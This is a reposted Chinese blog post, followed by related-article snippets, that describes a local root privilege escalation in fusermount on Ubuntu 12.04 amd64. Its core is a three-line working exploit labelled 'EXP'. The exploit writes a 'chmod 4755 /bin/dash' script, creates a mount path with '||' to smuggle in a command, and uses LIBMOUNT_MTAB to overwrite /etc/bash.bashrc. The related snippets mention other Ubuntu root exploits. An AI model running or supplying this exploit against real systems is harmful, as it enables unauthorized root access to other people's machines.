Ubuntu Linux 12.04 LTS amd64系统本地root提权

最新推荐文章于 2022-04-15 18:49:57 发布
最新推荐文章于 2022-04-15 18:49:57 发布
阅读量298 收藏
点赞数
文章标签: python php
原文链接:http://www.cnblogs.com/zheh/p/5386204.html
版权

URL:http://www.ichunqiu.com/section/173

 

由于fusermount二进制调用setuid的(geteuid())重置RUID时,它调用/bin/mount才能使用的特权挂载选项,通常是限制的。

但是,如果RUID!= euid ,ruid(实际用户ID,指的是进程执行者), euid( 有效用户ID,指进程执行时对文件的访问权限),在理论上fusermount可以消除参数以确保它的安全。然而,由于它认为这是被root用户权限调用,它允许通过环境变量进入调试模式, 不会管是否为安全的非特权用户和fusermount没有清的。因此当环境变量不清除时,调用RUID =0方式可以通过调试功能在/etc/mtab里设定LIBMOUNT_MTAB变量后,滥用覆盖任意文件。

 

EXP:
$ printf "chmod 4755 /bin/dash" > /tmp/exploit && chmod 755 /tmp/exploit
$ mkdir -p '/tmp/exploit||/tmp/exploit'
$ LIBMOUNT_MTAB=/etc/bash.bashrc _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit'

 

转载于:https://www.cnblogs.com/zheh/p/5386204.html

aod83029
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Ubuntu本地提权漏洞(CVE-2017-16995)复现
玄道的网安博客
11-27 1757
简介 Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。 漏洞概述 该漏洞存在于带有 eBPF bpf(2)系统(CONFIG_BPF_SYSCALL)编译支持的Linux内核中,是一个内存任意读写漏洞。该漏洞是由于eBPF验证模块的计算错误产生的。普通用户可以构造特殊的BPF来触发该漏洞,此外恶意攻击者也可以使用该漏洞来进行本地提权操作。 影响版本 Linux Kernel Version 4.14-4.4 (主要影响Debian和Ubuntu发行版
【手把手教你UbuntuUbuntu 12.04 LTS 安装与配置日记
淡红星空的专栏
07-20 2589
前天去暴风面试因为不用Linux被严重鄙视,表示作为Web后端开发者,Linux是一项必不可少的技能。郁闷了一天后,今天正式决定加入Ubuntu的怀抱! 昨天装了一个Ubuntu13.04版的,出现了bumblebee(双显卡驱动管理)无法apt-get,以及dashboard不能输入命令的重大BUG,决定装回12.04LTS。 下面简单的记一下安装配置的过程。 一、准备工作 1、首先要卸
Ubuntu12.04获取root权限
weixin_34090643的博客
07-24 117
有的时候我们需要Ubunturoot权限,我们该如何获取呢? 其实,很简单,我们只需要在终端中输入以下命令即可获得root权限。 第一步,打开终端 ( ctrl+alt+T ) 第二步,输入命令:sudo passwd root 若没有问题时,会提示输入密码。 第三步,进入root权限输入命令:su root 回车 提示输入密码: ...
ubantu提权
cnbird's blog
07-16 1010
ubantu提权
Ubuntu本地提权溢出漏洞overlayfs复现
EC_Carrot的博客
03-09 781
漏洞背景 该漏洞存在于带有 eBPF bpf(2)系统(CONFIG_BPF_SYSCALL)编译支持的Linux内核中,是一个内存任意读写漏洞。该漏洞是由于eBPF验证模块的计算错误产生的。普通用户可以构造特殊的BPF来触发该漏洞,此外恶意攻击者也可以使用该漏洞来进行本地提权操作。 影响范围 内核版本: Linux Kernel Version 大于3.13.0小于3.19 发行版本: Ubuntu Linux 15.04 Ubuntu Linux 14.10 Ubuntu Linux 14.04 Ubu
Linux】——Ubuntu提权(待解决)
给你一半糖
12-31 2291
最近一直在因为项目的需要需要安装Linux系统,因为自己之前从来没有接触过这方面的内容,从零开始遇到了很多让我自己措手不及的问题,其实关于这个问题现在也还没有解决。     关于如何在Ubuntu提权,按照百度经验上的方法,因为我本身为了省事,选择了永久提权。    第一步:输入sudo gedit /etc/passwd       第二步:将当前用户之后1000:1000两个均改
vagrant-lamp:Ubuntu 12.04 LTS 上带有 LAMP(Linux、Apache、MySql 和 PHP)的 Vagrant 基本框
07-14
Ubuntu 12.04 LTS 上带有 LAMP(Linux、Apache、MySql 和 PHP)的 Vagrant 基本框 要求 VirtualBox 流浪者 Git Vagrant HostsUpdater 插件 用法 启动 $ git clone ...
Linux之旅(I)——Ubuntu 12.04/14.04 LTS 安装
hyperton's blog
04-28 723
一直以来,都使用Win7系统,因为项目工作需要,转而开始Linux之旅。Linux之旅的起点在于Linux系统环境搭建,对于需要兼顾Windows系统的开发者而言,搭建Linux系统通常有两种方式:一是虚拟机安装Linux系统;一是安装windows&Linux系统。这两种方式笔者均使用过,但限于笔者的笔记本配置不高,系统内存受限,笔者使用过VMWare/VirtualBox两种虚拟机运行起来都
Ubuntu Server 12.04安装图解
08-19
Ubuntu Server 12.04,代号"precise pangolin",是Ubuntu发行版的一个长期支持(LTS)版本,为服务器环境提供了稳定、安全且高效的操作系统。这个版本的生命周期长达五年,确保了用户在维护期间能得到持续的安全更新...
Ubuntu12.04 安装报告.docx
最新发布
11-14
Ubuntu 12.04 是一个基于 GNU/Linux 的操作系统,特别适合于服务器环境,其长期支持版本(LTS)确保了长达五年的安全更新和支持。在本文中,我们将详细介绍如何在PC机工作站上安装Ubuntu Server 12.04 LTS。 **一、...
Linux文件属性及权限
Zane的博客
12-02 1086
查看用户信息 查看用户信息命令 id [root@localhost ~]# id zane uid=1000(zane) gid=1000(zane) groups=1000(zane) whoami 查看当前用户 [root@localhost ~]# whoami root who w 查看用户登录情况 [root@localhost ~]# w 10:21:54 up 8:23, 2 users, load average: 0.00, 0.02, 0.00 USER
CVE-2015-1328 Ubuntu 12.04, 14.04, 14.10, 15.04 overlayfs Local Root
weixin_34112181的博客
06-25 356
catalog 0. 引言 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix   0. 引言 新技术、高性能技术的不断发展,越来越提升了操作系统的能力,而近几年出现的虚拟化技术,包括overlayfs虚拟层叠文件系统技术,则为doc...
ubuntu12.04进入root权限命令——sudo和su命令详解
旺仔的专栏
02-07 1930
ubuntu用户管理 sudo意思就是super-user do,让当前用户暂时以管理员的身份root来执行这条命令。 su是用来改变当前用户的,su root,就是将当前用户切换为root,用了su root之后,下面所有的命令就可以不用打sudo了,因为当前用户已经是管理员root了。 root 用户为根用户,也就是 系统管理员 拥有全部权限 一个用户只能拥有一个 GID ,但是还可以
Ubuntu内核提权(CVE-2017-16995)
weixin_68652890的博客
04-15 770
内核提权 环境: 墨者靶场 工具 msf linux-exploit-suggester-master xshell 利用 xshell连接发现是hack权限 上传linux-exploit-suggester.sh到服务器 Possible Exploits:   CVE-2017-16995   CVE-2016-5195 CVE-2016-5195也可以利用 我们这里利用CVE-2017-16995进行提权 影响 CVE-2017-16995 Linux
Ubuntu用户提权Root
skysys的研究小屋
03-12 3322
在shell里面输入 sudo vim /etc/passwd 将里面的当前用户的ID值进行修改。譬如我的当前用户是chenjieb 则找到了 chenjieb:x:1000:1000:Administrator,,,:/home.chenjieb:/bin/bash 将两个1000改成0即可。即最后改完的结果为: chenjieb:x:0:0:Administrator,,,:/home.chenjieb:/bin/bash 最后将Ubuntu系统进行注销,然后在登陆的用户名里输入 你自己的用
ubuntu12.04添加root用户登录
愚赐的博客
06-27 2446
    在ubuntu下作linux开发过程中,搭建好开发环境默认的只有普通用户登录权限,但是在我们做某些操作的时候会提示权限不够,这时,我们往往需要在输入的指令之前加入"sudo",然后执行该指令,然后输入密码,才可以获取权限。    为了解决上边的麻烦,我们就需要系统中加入root用户登录,具体步骤如下:在普通用户登录模式下终端输入:#sudo vi /etc/lightdm/lightdm...
CVE-2017-16995————Ubuntu本地提权漏洞
Fly_鹏程万里
05-15 4807
前言近期看到了Ubuntu本地提权漏洞所以顺手演示一份,实践一波!漏洞描述Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux 。近期有白帽子爆出 ubuntu 的最新版本(Ubuntu 16.04)存在本地提权漏洞,漏洞编号为CVE-2017-16995。该漏洞存在于调用eBPF bpf(2)的Linux内核系统中,当用户提供恶意BPF程序使eB...
Ubuntu16.04.4本地提权漏洞
小北的博客
03-17 6903
Ubuntu16.04.4 本地提权漏洞
Ubuntu计划任务反弹shell提权
Longwaer
01-03 1720
学习Ubuntu计划任务反弹shell原理,了解掌握Linux提权新技巧。
Ubuntu12.04LTS系统安装教程
Ubuntu是一个基于Linux内核的操作系统,其12.04 LTS(长期支持版)因其稳定性和持续的更新支持而备受推崇。本教程特别适合那些担心安装过程中可能会损坏硬盘的用户。 安装过程通常包括以下几个关键步骤: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值